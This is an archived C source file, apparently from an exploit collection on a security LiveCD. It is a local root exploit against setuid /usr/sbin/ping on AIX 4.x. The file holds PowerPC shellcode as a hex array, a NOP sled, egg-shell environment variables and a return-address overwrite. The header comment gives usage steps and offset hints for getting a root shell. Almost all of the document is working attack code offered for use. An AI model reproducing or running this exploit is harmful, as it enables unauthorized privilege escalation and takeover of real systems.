home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / aix / local / aixping.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  3KB  |  101 lines

  1. /*
  2.  *
  3.  *   /usr/sbin/ping exploit (kinda' coded) by BeastMaster V
  4.  *
  5.  *   CREDITS: this is simpy a modified version of an exploit
  6.  *   posted by Georgi Guninski (guninski@hotmail.com)
  7.  *
  8.  *   This will give a #rootshell# by overwriting a buffer
  9.  *   in /usr/sbin/ping while ping is setuid to root.
  10.  *   This exploit is designed for AIX 4.x on PPC platform.
  11.  *
  12.  *
  13.  *   USAGE:
  14.  *            $ cc -o foo -g aix_ping.c
  15.  *            $ ./foo 5100
  16.  *            #
  17.  *
  18.  *
  19.  *   HINT: Try giving ranges from 5090 through 5500
  20.  *
  21.  *   DISCLAIMER: use this program in a responsible manner.
  22.  *
  23.  *   --> don't forget to visit http://www.rootshell.com
  24.  *   --> for more goodies :-)
  25.  *
  26.  */
  27.  
  28. #include <stdio.h>
  29. #include <stdlib.h>
  30. #include <string.h>
  31.  
  32. extern int execv();
  33.  
  34. #define MAXBUF 600
  35.  
  36. unsigned int code[]={
  37.         0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  38.         0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  39.         0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  40.         0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  41.         0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  42.         0x7c0903a6 , 0x4e800420, 0x0
  43. };
  44.  
  45. char *createvar(char *name,char *value)
  46. {
  47.         char *c;
  48.         int l;
  49.  
  50.         l=strlen(name)+strlen(value)+4;
  51.         if (! (c=malloc(l))) {perror("error allocating");exit(2);};
  52.         strcpy(c,name);
  53.         strcat(c,"=");
  54.         strcat(c,value);
  55.         putenv(c);
  56.         return c;
  57. }
  58.  
  59. main(int argc,char **argv,char **env)
  60. {
  61.         unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
  62.         int min=100, max=280;
  63.         unsigned int return_address;
  64.         char *newenv[8];
  65.         char *args[4];
  66.         int offset=5300;
  67.  
  68.         if (argc==2) offset = atoi(argv[1]);
  69.  
  70.         pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
  71.  
  72.         *((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
  73.         *((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff)
  74. ;
  75.         *((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
  76.         *((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff
  77. );
  78.  
  79.         return_address=(unsigned)&buf[0]+offset;
  80.  
  81.         for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
  82.         strcpy((char*)&buf[nop],(char*)&code);
  83.         i=nop+strlen( (char*) &code)/4-1;
  84.  
  85.         for(i=0;i<max-1;i++) frame[i]=return_address;
  86.         frame[i]=0;
  87.  
  88.         newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
  89.         newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
  90.         newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
  91.         newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
  92.         newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
  93.         newenv[5]=NULL;
  94.  
  95.         args[0]="ping";
  96.         args[1]=(char*)&frame[0];
  97.         execve("/usr/sbin/ping",args,newenv);
  98.         perror("Error executing execve \n");
  99.  
  100. }
  101.